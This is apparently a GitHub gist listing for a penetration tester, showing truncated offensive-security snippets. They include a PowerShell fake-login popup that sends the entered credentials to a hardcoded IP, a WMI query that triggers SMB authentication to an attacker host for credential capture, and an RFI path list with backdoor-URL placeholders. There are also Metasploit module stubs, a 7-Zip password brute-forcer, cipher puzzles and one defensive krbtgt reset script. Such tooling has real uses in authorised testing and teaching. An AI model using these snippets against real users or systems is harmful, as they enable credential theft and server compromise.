Skip to content

Instantly share code, notes, and snippets.

🎯
Focusing

Rob Fuller mubix

🎯
Focusing
Block or report user

Report or block mubix

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@mubix
mubix / WMIQuery_SMBAuth.ps1
Created Dec 18, 2015
Using a WMI Query to be able to capture credentials
View WMIQuery_SMBAuth.ps1
$share = "\\192.168.1.245\share"
$query = "Associators of {win32_LogicalShareSecuritySetting='$share'}"
Get-WmiObject -query $query
<#
Obtained using Impacket's SMBServer.py example
Attacker: 192.168.1.245
Victim: 192.168.1.100
Result:
View rfi-list.txt
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
/123flashchat.php?e107path=XXpathXX
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX?
@mubix
mubix / set_wallpaper.rb
Created Aug 19, 2015
Set Wallpaper Metasploit Post Module from Metasploit Minute
View set_wallpaper.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
@mubix
mubix / wallpaper.rb
Created Aug 19, 2015
Wallpaper Script from Metasploit Minute
View wallpaper.rb
#Change Wallpaper
session = client
key = "HKCU"
wallpaper = "kerby.bmp"
based = "/root/kerby.bmp"
# based = File.join(Msf::Config.install_root, "data", wallpaper)
bgcolor = "0 0 0" # set to 255 255 255 for white
refresh_cmd = "rundll32.exe user32.dll, UpdatePerUserSystemParameters"
View Bulles.md

Cipher Text #1:

214611044b181b161b040341061a000048150f0005554b5558514712031a061648080941060c520609130204195b522c4f170241071a011148000b0c040606455b5157410c141f001b4f47535d55060c050414412252040048030204055506171d1213040f55060a4815060a0e55060d0d41000006105212010f090805125216000e13410a1b1645050814120e115c45214611044b13130c0404034104031717480009054b1a04001a41060f0f551d130d1347000c141b0b48080941060c52090107024f4b341c0148150f001f551b1648160f184b3c52161d0204040e115c

Cipher Text #2:

200e0c041255000004080008041b0145090f03410a1b110c0d0f13411c101315070f14410a071745060e47121e170111011512150e55140a1a4106410c1a1d0148030b001801171748001341121a071748120e050e59520e010549
View Reset-KrbtgtKeyInteractive.ps1
<#----------------------------------------------------------------------------------------------------
Release Notes:
v1.4:
Author: Jared Poeppelman, Microsoft
First version published on TechNet Script Gallery
----------------------------------------------------------------------------------------------------#>
function Test-Command
{
@mubix
mubix / powershellpopup.ps1
Created Jan 12, 2015
Powershell Popups, proxy aware and auth aware
View powershellpopup.ps1
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');
@mubix
mubix / get_rss.rb
Created Dec 23, 2014
Parse Site List for RSS
View get_rss.rb
#!/usr/bin/env ruby
require 'feedbag'
require 'net/http'
source = Net::HTTP.get('ddosattackprotection.org', '/blog/cyber-security-blogs/')
body = source.split('"')
rss = []
body.each_with_index do |ob, index|
@mubix
mubix / 7zbrute.rb
Created Nov 4, 2014
7zip Cracking on the cheap
View 7zbrute.rb
#!/usr/bin/env ruby
# Need some help with this cracking script.
# Problems:
# 1) Slow, going through a large list like Rockyou takes forever
# 2) If there is no header encryption, 7z extracts to the target location
# then tries to decrypt, so threading would be painful
# 3) I need to know when the correct password is used and due to #2
# with threading that would be very difficult.
View hfs_script_inject.rb
##
# This module requires Metasploit: http//metasploit.com/donload
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Reank = NormalRanking
You can’t perform that action at this time.